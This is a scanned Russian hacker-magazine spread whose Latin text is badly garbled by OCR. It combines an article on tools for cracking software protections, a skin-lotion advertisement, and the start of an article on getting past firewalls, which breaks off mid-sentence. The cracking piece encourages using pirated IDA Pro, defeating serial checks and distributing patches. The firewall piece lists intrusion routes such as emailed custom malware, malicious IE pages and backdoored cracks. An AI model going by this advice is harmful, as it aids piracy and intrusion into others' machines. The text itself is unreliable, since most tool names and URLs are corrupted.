О Дизассемблеры 

Существует всего лишь один дизассемблер, при- 
годный для профессиональной работы — ЮА Рго 
( ѵѵѵѵѵѵ.ісіарго.сот ). стоящий немереных денег, но, как 
и всякое другое добро, свободно валяющийся в Осле 
и на просторах инета. Эта уникальная штука перева- 
риваетогромное количество форматов файлов и мно- 
жество типов процессоров, легко справляясь с байт- 
кодом виртуальных машин Оаѵа и.ЫЕТ, поддерживает 
макросы, плагины и скрипты, содержит интегрирован- 
ный отладчик, работает под М5-ЭОЗ, ѴѴіпсІоѵѵз, І_ІІ\ІІІХ 
и обладает уникальной способностью распознавать 
имена стандартных библиотечных функций по их сиг- 
натурам. 

Самое главное в ЮА Рго — это интерактивный дизас- 



> Старый добрый Мех-редактор Міеѵѵ 



семблер, то есть инструмент, позволяющий работать 
с двоичным файлом, мыслить и творить, а не тупой ав- 
томат, заглатывающий хакаемую программу и выпле- 
вывающий «готовый» дизассемблированный листинг, 
в котором все неправильно. 

В последних версиях ЮА РРО сделаны определенные 
подвижки в сторону автоматической распаковки фай- 
лов и снятия обфускаторов. Внушительную коллекцию 
плагинов и скриптов можно найти как на официальном 
сайте, таки на ѵѵѵѵѵѵ.орепгсе.огд . 

Конкурентам до ЮА Рго еще расти и расти, прямо как 
до Луны. Тем не менее, народ активно качает бесплат- 
ный (ныне заброшенный) дизассемблер и отладчик в 
одном «флаконе» — ѴѴЭазт: ѵѵѵѵѵѵ.ѵѵазт.ги/ЬаіхасІо.рІтр? 
тос!е=іооІ&ісІ=178 — и, судя по всему, остается доволен, 
хотя взломать что-то серьезное с его помощью практи- 
чески нереально. 

Остальные дизассемблеры выглядят более убого, 
поэтому не будем их рассматривать, разве что отме- 
тим Наскег ЭізаззетЫег Епдіпе ( раікоѵ-зііе.пагосі. 
ги/ПЬ. ІгітП . представляющий собой дизассемблер 
длин, распространяющийся в исходных текстах и 
предназначенный для встраивания в различные 
хакерские программы, занимающиеся перехватом 
функций, автоматической распаковкой, генераци- 
ей полиморфно го кода и т. д. 

О Декомпиляторы 

Декомпиляцией называется процесс получения ис- 
ходного текста программы из двоичного файла. В 
полном объеме декомпиляция невозможна в принци- 
пе, поскольку компиляция — однонаправленный про- 
цесс, причем с потерей данных. Однако декомпилято- 
ры все-таки существуют и со своей задачей достойно 
справляются. 

Для программ, написанных на ОЕІ_РНІ и Вогіапб Виіісіег 
с использованием ЯТТІ, возможно восстановить 





> Если ІсеЕхі откажется 
запускаться, скор- 
ректируй следую- 
щие ключи в данной 
ветви системного 
реестра: НКІ_М\ЗѴЗТЕМ\ 
СиггепЮопІгоІЗеіХ 
ЗегѵісезММТІсе: 
ШНеарЗіге (ОѴѴОРЮ): 
0x8000; ШЗіаскЗіге 
(ОѴѴОРЮ): 0x8000. 



ОНЫЕ 



> Все программы приве- 
дены для ознакомления. 
Используй их в чисто ис- 
следовательских целях, 
иначе рискуешь понести 
ответственность. 




> Весь хакерский чемо- 
данчикты традиционно 
найдешь на нашем РУО. 
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исходную структуру классов, вплоть до 
имен функций-членов, а также реконс- 
труировать формы и «вычислить» адре- 
са обработчиков каждого из элементов. 
Допустим, у нас имеется диалоговое окно 
«гедізігаііоп» с кнопкой «ОК», и мы хо- 
тим знать, какая процедура считывает 
серийный номер и что с ним делает. Нет 
ничего проще! Берем бесплатный ОеОе 
( ргодгаттегзІооІз.огд/посІе/120 ). декомпи- 
лируем программу — и вперед! 

Для ѴізиаІ Вазіс'а существуют свои 
декомпиляторы, лучшим из кото- 
рых считается ѴВ Оесотрііег от 
ОРсН ( ѵѵѵѵѵѵ.ѵЬ-сІесотріІег.ога/іпсІех. 

рНр?р=РгосІисіз 1. Другие бейсик-декомпи- 
ляторы — ѴВВегО ^ѵѵѵѵ.ѵЬгегд.сотЛ . ѴВРЕ 
( ргоагаттегзІооІз.ога/побе/129 ) и Зрісез. 
РесотріІег( ргоагаттегзІооІз.ога/побе/635 ) 

— будет также полезно положить в свой ха- 
керский чемоданчик. 

Большой интерес представляют декомпиля- 
торы инсталляторов, поскольку многие про- 
верки производятся как раз на стадии инс- 
талляции. Самый популярный инсталлятор 

— ІпзІаІІ ЗНіеІсІ. И вот куча декомиляторов к 
нему ( ргоагаттегзіооіз.ога ): ІпзІаІІЗІліеІсІ X 
ІІпраскег, ѴѴіпбоѵѵз ІпзіаІІзМеІсІ Ресотрііег, 
ІпзіаІІЗМеІсІ Ресотрііег и всякая мелочь 
типа ізРсс. 

Что же касается Заѵа и платформы .МЕТ, то 
с ними замечательно справляется ІРА Рго, 
а если ее под рукой нет, то можно восполь- 
зоваться специализированными декомпи- 
ляторами, которые можно найти на сайтах 
ѵѵѵѵѵѵ.сгаскІаЬ.ги и ѵѵѵѵѵѵ.ѵѵазт.ги вместе с де- 
компиляторами Рох Рго, СІіррег'а и прочей 
экзотикой. 

О Нех-редакторы 

Давным-давно Нех-редакторы представ- 
лял и собой простые программы, умеющие 
всего лишь отображать двоичный файл в 
шестнадцатеричном виде и править бай- 
ты по указанным адресам (кстати, вместо 
них часто использовался редактор диска 
ІЧогІоп РізкЕсІііог), но со временем они об- 
росли дизассемблерами, ассемблерами, 
встроенными калькуляторами, функциями 
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> Выбираем жертву для АРІ-шпиона КегЬегоз 
от Рустема Фасихова 



регулярного поиска, научились работать 
с блоками, понимать различные форматы 
файлов и даже расшифровывать/зашиф- 
ровывать фрагменты кода/данных. В об- 
щем, эдакий швейцарский ножичек с шес- 
тнадцатью интструментами. 
НаибольшуюпопулярностьзавоевалНІЕѴѴ 
( ууеЬНоз1.кет1е1.ги/~зеп ). Вплоть до версии 
6.11 (поддерживающей М2/РЕ/МЕ/І_Е/ЕІ_Р- 
форматы) он распространяется на бес- 
платной основе, а теперь за него просят 
денежку, которую я лично платить не хочу и 
продолжаю пользоваться своей любимой 
6.04, в которой гораздо меньше багов. 
Другой хороший редактор, по своим воз- 
можностям не только не уступающий 
Ыеѵѵ'у, но даже превосходящий его — это 
НТЕ ( Иіе.зоигсеІогае.пеО . распространя- 
ющийся в исходных кодах на бесплатной 



основе и, в отличие от Ыеѵѵ'а, позволяю- 
щий выбирать способ ассемблирования 
инструкции (если инструкция может быть 
ассемблирована более чем одним путем), а 
также поддерживающий мощную систему 
перекрестных ссылок, вплотную прибли- 
жающей его к ЮА Рго. 

Западные хакеры во всю прутся от ком- 
мерческих ѴѴіпНех'а ( ѵѵѵѵѵѵ.ѵѵіпИех.сотП и 
Нех ѴѴогкзбор'а ( уууууу.ЬрзоИ.сот ). Чего они 
в них нашли — непонятно. Ни ассемблера, 
ни дизассемблера в нем нет, и навряд ли по- 
явятся в дальнейшем, зато есть калькуля- 
тор контрольных и хэш-сумм (типа СРС16, 
СРС32, ІѴЮ5, ЗНА-1), что в некоторых случа- 
ях оказывается очень удобным. 

О Распаковщики 

Все больше и больше программ распро- 
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страняются в упакованном виде (или за- 
щищаются протекторами, чтоещехуже), в 
результате чего их непосредственное ди- 
зассемблирование становится невозмож- 
ным, а поскольку многие упаковщики/про- 
екторы содержатантиотладочные приемы, 
то страдает и отладка. 

Попытки создать универсальный распа- 
ковщик многократно предпринимались 
еще со времен МЗ-ООЗ и всякий раз про- 
валивались, так как разработчики защит 
придумывали новую гадость. Тем не менее, 
в состав большинства хакерских инстру- 
ментов (ЮА Рго, ОІІуОЬд) входят генети- 
ческие распаковщики, справляющиеся с 
несложными защитами. Сложные же при- 
ходится распаковывать руками (тому, как 
это сделать, посвящено множество статей, 
которые легко найти в сети). Когда же один 
и тот же упаковщик встречается хакеру 
десятый раз кряду, он матерится и пишет 
автоматический/полуавтоматический рас- 
паковщик, чтобы облегчить себе работу. 
Коллекции таких распаковщиков собра- 
ны на ѵѵѵѵѵѵ.ехеіооіз.сот/ипраскегз. Мт , 
ргодгаттегзіооІз.огдЯахопотуЯегт/16 . 
ѵѵѵѵѵѵ.ѵѵоосІтапп.сот/сгаскг/Раскегз.ІпІт 
и других сайтах. Проблема состоит в том, 
что каждый такой распаковщик рассчитан 
на строго определенную версию упаков- 
щика/протектора и с другими работать 
просто не может! Чем чаще обновляется 
упаковщик/протектор, тем сложнее найти 
подходящий распаковщик, поэтомулучше 
полагаться только на самого себя, распа- 
ковывая программу руками (и мы уже пи- 
сали как). 

Кстати, прежде чем искать распаковщик, 
неплохо бы для начала выяснить, чем же 
вообще защищена ломаемая программа? 
В этом поможет бесплатная утилита РЕЮ 
( реісІ.Иаз.іб . содержащая огромную базу 
сигнатур, хотя довольно часто ошибающа- 
яся или дающая расплывчатый результат, 
но, тем не менее, это все-таки лучше, чем 
совсем ничего. 

О Дамперы 

Снятие дампа с работающей программы 
— универсальный способ распаковки, 
убивающий практически все упаковщики 
и большую часть протекторов, правда, над 
полученным дампом еще предстоит как сле- 
дует поработать, и я рекомендую использо- 
вать дамп лишь для дизассемблирования. 
Сдампленная программа может работать неус- 
тойчиво, периодически падая в самый ответе- 
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твенный момент. Но это ладно, это все лирика. 
Забьем на лирику и обратимся к практике. 
Самым первым (и самым неумелым) был 
РгосОитр, затем появился І_огсІ РЕ, учи- 
тывающий горький опыт своего предшес- 
твенника и способный сохранять дамп 
даже в тех случаях, когда РЕ-заголовок 
умышленно искажен защитой, а доступ к 
некоторым страницам памяти отсутствует 
(атрибут РАОЕ_І\ІОАССЕЗЗ). Венцом эво- 
люции стал РЕ-ТООІ-3, базовый комплект 
поставки которого можно найти практи- 
чески на любом хакерском сервере, на- 
пример, на ѴѴАЗМ'е ( ѵѵѵѵѵѵ.ѵѵазт.ги/Ьаіхабо. 
рНр? тос!е={ооІ&ісІ=124 ) или на СгаскІ_аЬ'е 
( ѵѵѵѵѵѵ.сгаскІаЬ.ги/боѵѵп1оасІ.рІір?асііоп=аеі& 
п=МТШ V а свежие обновления лежат на 
«родном» сайте проекта пеох.іаІр.Ьѵ . кста- 
ти говоря, уже несколько раз поменявшим 
свой адрес (по непонятым причинам базо- 
вый пакет на нем отсутствует). 

После снятия дампа необходимо, как ми- 
нимум, восстановить таблицу импорта, а 
иногда еще и таблицу перемещаемых эле- 
ментов вместе с секцией ресурсов. Импорт 



лучше всего восстанавливать знаменитым 
Ітрогі РЕСопзігисіог'ом, который вместе 
с РеІоХ'ом, восстанавливающим таблицу 
перемещаемых элементов и минимально 
работающим генетическим распаковщи- 
ком можно найти там же, где и РЕ-ТООІ-3: 
ѵѵаѵе.ргоНозІіпа.сот/таскІ/таіп.ІЩт . 

А вот здесь лежит коллекция программ 
для восстановления таблицы ресур- 
сов: ѵѵ\л/ѵѵ.\л/азт.ги/Ьаіхабо.рІір?тобе 
=іооі&ісі=156 . Если же ни одна из них не 
справится со своей задачей, то, скорее 
всего, поможет бесплатный Везоигсе 
Віпсіег: ѵѵѵѵѵѵ.зеіізоіі.сот/ги/гебігесі. 
рНр? сііісі = 89 . 

О Редакторы ресурсов 

Редактировать ресурсы приходится во 
многих случаях. Например, чтобы сменить 
текст диалогового окна, разблокировать 
элемент управления, перебить логотип и 
т. д. Формально редактор ресурсов входит 
в каждый ѴѴіпсІоѵѵз-компилятор, в том числе 
и в Місгозоіі ѴізиаІ Зіисііо, вот только после 
редактирования ресурсов файл зачастую 
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> Бесплатный отладчик ОІІуБВО вкупе с плагинами творит чудеса 



становится неработоспособным! Этопото- 
му, что штатный редактор ресурсов ктаким 
задачам неприспособлен! 

Лучшим хакерским редактором был и ос- 
тается коммерческий Яезіогаіог Везоигсе 
ЕсИог ( ѵѵѵѵѵѵ. боте. сот /Везіогаіог ). который 
может практически все, что нужно, и даже 
чуточку больше. Из бесплатных утилит 
хотелось бы отметить ХІ\І Резоигсе Есіііог 
( ѵѵѵѵѵѵ.ѵѵіІзопс.сІетоп.со.ик/сІІОгезоигсеесІііог. 
Ыш), написанный на совсем не хакерском 
языке ОЕІ_РНІ и распространяющийся в ис- 
ходных текстах, что позволяет наращивать 
функционал программы, затачивая ее под 
свои собственные нужды (если ты знаешь 
ОЕЬРНІ, конечно). 

□ Шпионы 

В основном используется два типа шпи- 
онов: шпионы ѴѴіпсІоѵѵз-сообщений и 

АРІ-шпионы. Первые следят за посылкой 
сообщений окнам и элементам управле- 
ния, вторые — за вызовом АРІ-функций, 
включая функции, экспортируемые дина- 
мическими библиотеками, поставляемыми 
вместе с программой. Шпионаж — лучшее 
(и наиболее дешевое в смысле усилий и 
времени) средство, позволяющее узнать, 
чем «дышит» защищенная программа. 
Вполне достойный шпион сообщений вхо- 
дит в штатную поставку МісгозоЙ ѴізиаІ 
Зіисііо и называется Зрухх.ехе. Аналогич- 
ный по возможностям шпион, но только с 
открытыми исходными текстами, лежит на 
уѵ\д/ѵу.са1сИ22.пе1/зоІ1ѵѵаге/\А/іпзрѵ.азр и со- 
вершенно бесплатен. 



Лучшим из АРІ-шпионов, на мой 
взгляд, является КегЬегоз от Русте- 
ма Фасихова ( ѵѵѵѵѵѵ.ѵѵазт.ги/ЬаіхасІо. 
рЬр?тосІе=1ооІ&ісІ=313 > ). Он взялсяза клави- 
атуру тогда, когда остальные шпионы пере- 
стали его устраивать. Тем не менее, о вкусах 
не спорят, и многие пользуются АР13ру32 
(таким же бесплатным, как и КегЬегоз), кото- 
рый можно раздобыть на ѵѵѵѵѵѵ.іпіегпаіз.сот . 
Впрочем, любой нормальный отладчик, та- 
кой как зоШісе и ОІІуОЬд, можно настроить 
так, чтобы он выполнял функции АРІ-шпи- 
она, причем действуя по избирательному 
шаблону, избавляющему нас от просмот- 
ра многокилометровых листингов, гене- 
рируемых КегЬегоз'ом и АР13ру32. 

О Мониторы 

Чтобы узнать, к каким файлам или вет- 
вям реестра обращается подопытная 
программа, достаточно воспользовать- 
ся файловым монитором (или монитором 
реестра, соответственно). Оба они были 
написаны легендарным исследователем 
недр ѴѴіпсІоѵѵз Марком Руссиновичем и 
долгое время распространялись совер- 
шенно бесплатно через некоммерческий 
сайт ѵѵѵѵѵѵ.зѵзіпіегпаіз.сот . однако в июне 
2006 года Руссинович продался Місгозоф и 
хотя его утилиты обещают остаться бесплат- 
ными и впредь, скорее всего, они будутнеоп- 
лачиваемыми только для легальных пользо- 
вателей ѴѴіпсІоѵѵз, так что спеши качать. 

□ Модификаторы 

Существует два диаметрально противопо- 
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ложных подхода к взлому программ. Самое 
трудное (но самое идеологически правиль- 
ное и наименее всего наказуемое) создание 
своих собственных генераторов серийных 
номеров, ключевых файлов и т.д. Проанали- 
зировав работу оригинального генератора, 
хакер пишет точно такой же и раздает его 
всем, кому надо (и кому не надо — тоже). Од- 
нако это слишком утомительно, тем более что 
большинство защит нейтрализуются прав- 
кой несколькихбайт. Воттолько распростра- 
нять взломанный файл нельзя: за это могут 
и по лапкам дать. К тому же, как правило, 
ехе/сІІІ слишком тяжелы для распростране- 
ния, поэтому возникает естественная идея: 
распространять не сам взломанный файл, 
а список байт с адресами, которые надо ис- 
править. Понятное дело, что никакой юзер с 
Іііеѵѵ'ом внутрь программы не полезет, поэ- 
тому на помощь приходит автоматизация. 
Получить список различий между ориги- 
нальным и взломанным файлом поможет 
утилита (с. ехе, входящая в штатный комп- 
лект поставки ѴѴіпсІоѵѵз. А вот чтобы внести 
исправления в ехе/сІІІ, понадобится утили- 
та-модификатор, которую можно написать 
буквально за несколько минут, а если пи- 
сать лень, то могу предложить коллекцию 
уже готовых: ѵѵѵѵѵѵ.ѵѵазт.ги/ЬаіхасІо.рІтр? 
птосІе=1ооІ&ісІ=35 . 

Хуже, если программа упакована/защи- 
щена протектором. Тогда ее приходится 
править уже на лету, непосредственно в 
оперативной памяти, для чего пригодит- 
ся Ргосезз РаІсІтег ( ѵѵѵѵѵѵ.ѵѵазт.ги/ЬаіхасІо. 
рЬр?тосІе=іооІ&ісІ=38 ). Р! ЗС'з Ргосезз 
РаісЬег ( ѵѵѵѵѵѵ.ѵѵа5т.ги/ЬаіхасІо.рЬр?тосІе= 
1ооІ&ісІ=39 ) или *АВЕІ_* Зеіі Ьеагпіпд Ьоасіег 
Оепегаіог ( ѵѵѵѵѵѵ.ѵѵазт.ги/ЬаіхасІо. рЬр?тосІе 
=іоо!&ісІ=144 Т Последняя программа отли- 
чается тем, что ищет исправляемые байты не 
по фиксированным смещениям, а по регуляр- 
ным шаблонам, что позволяетей в большинс- 
тве случаев переживать выход новой, слегка 
измененной версии ломаемой программы 
(если, конечно, изменения затронули не за- 
щитный механизм, а что-нибудь другое). 

О Думать! 

Прочитав статью, ты, естественно, не на- 
учишься взламывать программы. Но знать, 
когдаи какой инструментприменить, — это 
уже большое дел о. Рекомендую перечитать 
материал еще раз, чтобы все основательно 
уложилось в голове, а затем приступить к 
чтению других статей на эту тему. И я поче- 
му-то уверен, что все у тебя получится. НС 
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Н а меня тогда вышла одна юная журналистка. 

И сказала, делаем о тебе репортаж - ты надезда 
русского скейтбординга! Я, представляешь? 
Только, говорит, срочно: номер сдаем! А у меня 
лицо тогда было - ну, экологическая катастрофа! Всё 
в прыщах! 

И вдруг вижу в магазине новый лосьон СІеагазіІ 1ЛТРА. 
Написано, видимый результат за три дня... Я попробовал. 
Правда помогает!! Статья, конечно, та еще получилась, 
в журналистике эта девушка понимает больше, чем 
в досках, переврала половину! Но фотки - никакого 
фотошопа, супер! 
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БРАНДМАУЭРЫ (ОНИ ЖЕ РІРЕ\Л/АІ_І_'Ы) СЕЙЧАС ИСПОЛЬЗУЮТСЯ ПОВСЕМЕСТНО. ИХ ВСТРАИВАЮТ В 08Б-М0ДЕМЫ, ѴѴІ-ЕІ 
ТОЧКИ ДОСТУПА, МАРШРУТИЗАТОРЫ, ОПЕРАЦИОННЫЕ СИСТЕМЫ, АНТИВИРУСЫ И ДРУГИЕ ПРОГРАММНЫЕ ПАКЕТЫ ТИПА 
ЗУСАТЕ РЕВЗОЫАБ ЕІВЕѴѴАЕБ ИЛИ ОІІТРОЗТ. БОЛЬШИНСТВО ПОЛЬЗОВАТЕЛЕЙ ДАЖЕ НЕ ПРЕДСТАВЛЯЮТ, ЧТО ЭТО ТАКОЕ, 
НО НА 1 00% УБЕЖДЕНЫ, ЧТО ФАЙРВОЛ СПАСЕТ ИХ ОТ ВСЕХ БЕД. НО ТАК Л И ОНИ НАДЕЖНЫ, КАК УТВЕРЖДАЕТ РЕКЛАМА? 



П режде чем начать, необходимо вы- 
яснить, что такое персональные 
брандмауэры и чем они отличают- 
ся от не персональных (за отсутствием под- 
ходящей терминологии назовем их «внеш- 
ними»), Внешний брандмауэр представляет 
собой штуку, включенную в разрыв между 
сетевым кабелем (ЕФегпеіЛ/ѴіЕі/ЭіаІир) и 
сетевой картой охраняемого узла (не важ- 
но — сервером или клиентской машиной). 
Конструктивно внешний брандмауэр может 
быть реализован и как микросхема, встро- 
енная в ЭЗІ_-модем/материнскую плату, и как 
самостоятельный узел — маршрутизатор/ 
мост, построенный на базе ІВМ РС и управ- 
ляемый любой подходящей операционной 
системой (например, І_ІІ\ІЕ)Х, хотя и ѴѴіпсІоѵѵз 
тоже сгодится). 

Возможности воздействия на внешний 
брандмауэр минимальны. Если он скон- 
фигурирован правильно и не имеет дыр, 



то проникнуть на атакуемую машину сети 
извне очень трудно. А вот вырваться из 
внешнего брандмауэра на свободу ничего 
не стоит, поскольку он ничего не знает ни 
о процессах, ни о потоках. Ему неведомо 
понятие «зловредной программы». Все, 
что он имеет в своем распоряжении, — это 
список открытых портов, среди которых в 
обязательном порядке присутствует 80-й 
порт, связанный сѴѴЕВ. Следовательно, лю- 
бое приложение может беспрепятственно 
устанавливать соединения с любыми ІР-ад- 
ресами по 80-му порту, скрытно пересылая 
конфиденциальную информацию или уста- 
навливая Ьаск-сіоог. Брандмауэр ничего не 
сможет с этим сделать (особенно, если зло- 
вредная программа «обернет» пересылае- 
мые данные в НТТР-запросы), поскольку он 
не в состоянии отличить, кто посылаетТСР/ 
ІР-пакеты: РігеРох.ехе или еѵіі-ѵігиз.ехе! 
Персональные брандмауэры устанавлива- 



ются непосредственно назащищаемый ими 
компьютер, поэтому не только поддержива- 
ют списки «доверенных приложений», но 
также пытаются отслеживать факт внедре- 
ния в них постороннего кода, чтобы малварь 
не смогла передать информацию «руками» 
ЕігеРох'а или ІЕ. Все это, конечно, замеча- 
тельно, хотя есть одно «но»! Тот факт, что 
персональный брандмауэр находится на той 
же самой машине, что и малварь, делает 
его чрезвычайно уязвимым против атак на 
сам брандмауэр. Малварь, заполучившая 
администраторские права, может делать 
абсолютно все, что угодно, в том числе и 
обмениваться пакетами в обход брандмау- 
эра! Изначальная задумка протестировать 
несколько популярных продуктов на на- 
дежность оказалась провальной. И знаешь 
почему? Потому что абсолютно все персо- 
нальные файрволы обходятся довольно 
простыми (зачастую универсальными) 
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> ТСРѴіеѵѵ не может закрыть системное соединение 

методиками даже с прикладного уровня. Доходчивый 
рассказ о том, как пробить защиту, будет лучшим дока- 
зательством, что надежной защиты нет. Установленные 
одновременно и внешний, и персональный файрволы, 
безусловно, защищают сеть, но даже в этом случае нет 
никаких гарантий, что нас не атакуют! 

О Из внешней сети во внутреннюю через 
брандмауэр 

Вот компьютер, который мы хотим атаковать, но снару- 
жи его находится неприступная стена брандмауэра. В 
ней есть порт, но он наглухо закрыт. Какие будут идеи 
по поводу того, как его пробить?Тут уместно сделать ма- 
ленькое лирическое отступление, поскольку подавляю- 
щее большинство пользователей понятия не имеют, что 
такое брандмауэр и зачем он вообще нужен! 

Вообразим себе домашнюю (или корпоративную) сеть с 
приватными ресурсами, ведь оченьутомительно каждый 
раз вводить пароль при доступе к файловому хранили- 
щу, реализованному через МісгозоІІ ЗНагесІ или Тір, или 
такой банальной вещью, как НТТР-Ргоху сервер. Чтобы 
не покупать для каждой машины свой ІР, администратор 
назначаетвсем машинам внутрисетевые ІР. Реальный ІР 
получает только одна машина, на ней же устанавлива- 
ется Ргоху-сервер, через который ходят все остальные. 
Слово «все» в данном случае следует понимать букваль- 
но. Любой хакер, обнаруживший путем сканирования 
работающий Ргоху может использовать его в своих це- 
лях. Азатрафикбудетплатитьвладелецатакованной ма- 
шины. Оно ему надо? Воттут-то брандмауэр и выручает, 
закрывающий Ргоху-порт для всех нелокальных узлов 
(ну, при желании можно добавить несколько адресов 
удаленных партнерских фирм). То же самое и с іір. 
Внутри сети с ним можно общаться беспрепятственно, 
но вот все внешние подключения будут безжалостно 
отсечены брандмауэром! 

Отсюда вывод: если у тебя нет ни Ргоху, ни Т1:р, и ты не 
используешь разделяемые ресурсы, не защищенные 
паролем, — нафига тебе вообще нужен брандмауэр?! 
Разве только, чтобы почувствовать себя крутым и про- 
двинутым парнем. А то уже некоторые без брандмауэра 
в сеть вообще выходить боятся. Другой вопрос, что ко- 



варная ѴѴіпсІоѵѵз, вотличиеот де- 
мократичнонастроенной І_ІІ\ІІІХ, 
открывает для своих нужд кучу 
никому не нужных портов, кото- 
рые не так-то просто отключить 
и которые содержат уязвимос- 
ти. Достаточно вспомнитьчервя 
МЗВІазі, распространяющего- 
ся через дыру в сервисе ОСОМ, 
висящем на 135 порте и реально 
полезным только в корпора- 
тивных сетях, разделенных на 
домены. 

Взять, к примеру, список портов, открытых на моем 
компьютере (смотри скриншот). Для того чтобы узнать, 
какие порты открыты, достаточно вызвать штатную ути- 
литу пеізіаі.ехе, передав ей в командной строке ключ «- 
а». Бесплатная утилита ТСРѴіеѵѵ от Марка Руссиновича 
(ѵѵѵѵѵѵ.зѵзіпІегпаІз.сот/иііІіІіез/ТсІіМоп.ІіІппП . кстати гово- 
ря, распространяемая в исходных кодах, покажетболь- 
ше информации (в частности, сообщит, какой процесс 
пользует тот или иной порт), а также поможет закрыть 
любое соединение, кроме системных. Такие порты при- 
ходится закрывать уже на брандмауэре, или постоянно 
устанавливать свежие заплатки, латая систему путем 
затыкания дыр (но это не лучшее решение, поскольку о 
многих дырах МісгозсФ узнает в последнюю очередь). 
Для более детального анализа трафика можно исполь- 
зовать снифер, который встроен практически в каждый 
профессиональный брандмауэр, или утилиту ТОІМоп 
все оттого же Марка Руссиновича, которая покажеттра- 
фик, проходящий через ТОІ-драйвер — один из наибо- 
лее низкоуровневых сетевых драйверов. 

Но все-таки! Как насчет ответа на поставленный ранее 
вопрос? Можно л и проникнуть сквозь закрытый порт или 
нет? Что тут сказать. Брандмауэры первых поколений 
обходились только так. Достаточно было послать сильно 
фрагментированный ТСР-пакет, настолько фрагменти- 
рованный, что целевой порт не попадал в первый ІР-па- 
кет, а поскольку функцией сборки ІР-пакетов брандмау- 
эр по ряду причин не оснащен, то он свободно пропускал 
эту «бомбу». Но это в основном относится к внешним 
брандмауэрам. А персональные работают сразу на мно- 
гих уровнях, в том числе контролируя пакеты, уже соб- 
ранные драйвером ТСРІР.ЗѴЗ, и с ними этот фокус уже 
не проходит. Хуже того! Они могут забить тревогу, по- 
скольку в реальной жизни такие фрагментированные 
пакеты практически никогда не встречаются! 

Но даже если брандмауэр пропуститтакой пакет, то это 
не сильно поможет атакующему, поскольку все совре- 
менные серверы (Тір, ргоху) давным-давно научились 
различать интерфейсы сетевых соединений, автома- 
тически отсекая нежелательные подключения. Взять 
хотя бы установленный у меня ЕІІіп НИР Ргоху Зегѵег, 
связывающий машины моей локальной сети с внешним 
миром. Чтобы не закрывать порт на брандмауэре и не 
назначать на доступ к Ргоху пароль (которые поддержи- 
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ОѴШСЕК! 



Напомню только, 
что мой РТР-сервер 
( Кр://пе 2 иті.ога.ги/риЬЛ 
с массой статей и 
прочей документацией 
работает не все время, а 
только тогда, когда я не 
сплю. Сейчас это где-то 
между 21 :00 и 1 2:00 по 
Москве со сдвигами в ту 
или иную сторону. 




что персональные 
файрволы не дают 1 00% 
гарантии, установить 
его все же рекомендую. 
Хорошая подборка 
будет ждать тебя на 
РУР-диске. 

> Изначальная задумка 
протестировать 
несколько популяр- 
ных продуктов на 
надежность оказалась 
провальной. И знаешь 
почему? Потому что аб- 
солютно все персональ- 
ные файрволы обходят- 
ся довольно простыми 
(зачастую универсаль- 
ными) методиками даже 
с прикладного уровня. 



/043 






» 



рс_Еопе 




вают нѳ все программы), я поступил проще, 
разрешив Ргоху принимать подключения 
только с одного интерфейса — интерфей- 
са локальной сети. То же самое относится к 
внутреннему Іір-серверу. 

Выходит, что даже если атакуемый порт от- 
крыт на брандмауэре (или брандмауэр уда- 
лось пробить каким-нибудь стенобитным 
орудием), то вовсе не факт, что атака возы- 
меетуспех! 

Нет, ну это несерьезно и неинтересно! А как 
же атаковать тогда?! Вот несколько секретов, 
которые могут помочь начинающим. Во-пер- 
вых, можно попробовать атаковать один из 
доверенных узлов путем посылки вируса во 
вложении или использовании подходящей 
уязвимости. Крупные корпорации обычно 
так и атакуются. Они имеют множество под- 
разделений во всех странах мира, но далеко 
не в каждом из них работают грамотные и от- 
ветственные администраторы. 

Во-вторых, можно атаковать один из узлов 
локальной сети. А как это можно сделать? 
Самое простое (но уже далеко не самое ак- 
туальное) — послать в письме специальную 



программу. Если эта программа не стащена 
с какого-то хакерского сайта, а написана 
самостоятельно, индивидуально для дан- 
ной конкретной атаки, то антивирусы с вы- 
сокой степенью вероятности пропустят ее, 
но пользователь за последнее время резко 
поумнел и что попало уже не запускает, пос- 
кольку выволочка, устроенная администра- 
тором за последний запуск соблазнитель- 
ного вложения, еще свежа в его памяти. К 
тому же сейчас появилась модная тенден- 
ция настраивать корпоративные серверы 
так, чтобы все исполняемые файлы автома- 
тически вырезались, даже если они нахо- 
дятся в архивах! Впрочем, к домашним ло- 
кальным сетям это не относится, и женщины 
по-прежнему запускают все, что угодно. 
В-третьих, можно заманить жертву на спе- 
циальным образом сконструированную 
ѴѴЕВ-страничку, эксплуатирующую ту или 
иную уязвимость в ІЕ. Или не обязательно 
уязвимость! Редкий пользователь знает 
про уровни безопасности. На странички, 
открываемые из сети, действуют весьма 
драконические ограничения, и Заѵа-скрип- 
ты отдыхают. Но вот 
при последующем 
открытии той же са- 
мой странички, со- 
храненной на диск, 
ситуация меняется 
до чрезвычайнос- 
ти! Так что проник- 
нуть в локальную 
сеть для опытного 
хакера не составит 
никакого труда! 
Наконец, всеми го- 
рячо любимая опе- 
рационная система 
ѴѴіпбоѵѵз содержит 
столько дыр, что мо- 
жет быть легко ата- 
кована с приобре- 
тением привилегий 
8У5ТЕМ, с которы- 
ми отключить бран- 
дмауэр не составит 
никакого труда! 

Вот неполный пе- 



речь способов обхода брандмауэров из- 
вне. И он действительно работает, особен- 
но всвететого, что приобретать легальные 
продукты наши соотечественники (да и 
зарубежные товарищи) не очень-то любят, 
а демонстрационный срок не бесконечен, 
и рано или поздно человек залезает в Осла 
(или другое животное) и начинает тянуть 
его за хвост в поисках крэков, многие из 
которых содержат в себе самый настоя- 
щий Ьаск-сіоог, прочно вгрызающийся в 
компьютер и дезактивирующий брандма- 
уэр. О том, как это сделать, мы сейчас и 
поговорим. 

О Из внутренней сети во внешнюю 
через брандмауэр 

Что касается проникновения во внешнюю 
сеть, огражденную внешним брандмауэром, я 
уже писал в статье «Побег через брандмауэр 
плюс терминализация всей ЫТ», электрон- 
ную копию которой можно свободно утянуть 
с Йр://пе 2 иті.ога.ги/риЬ/ 2 д-\л/огт-Ііге\л/аІ 1 . 2 Ір 
(или взять с нашего диска. — Прим. Зіер’а). Пов- 
торяться не буду. 

Что же касается персональных брандмауэ- 
ров, то вырваться из-под их гнета значитель- 
но сложнее. Большинство публикаций наэту 
тему предполагает, что атакующая програм- 
ма имеет администраторские привилегии, 
с помощью которых она может спуститься 
на нулевое кольцо термоядерного уровня и 
дезактивировать все датчики брандмауэрас 
той же осторожностью, с какой сапер разми- 
нирует бомбу. Очень хорошая статья «Обход 
ОіЛрозі РігеѵѵаІІ 3.x и 4.0 в КегпеІ тобе» лежит 
на \А/\А/\А/.\д/азпп.ги/агІісІе.рІір?агІісІе=оиІрозІк . 
Она подробно описывает методику пере- 
хвата и фильтрации пакетов, используемую 
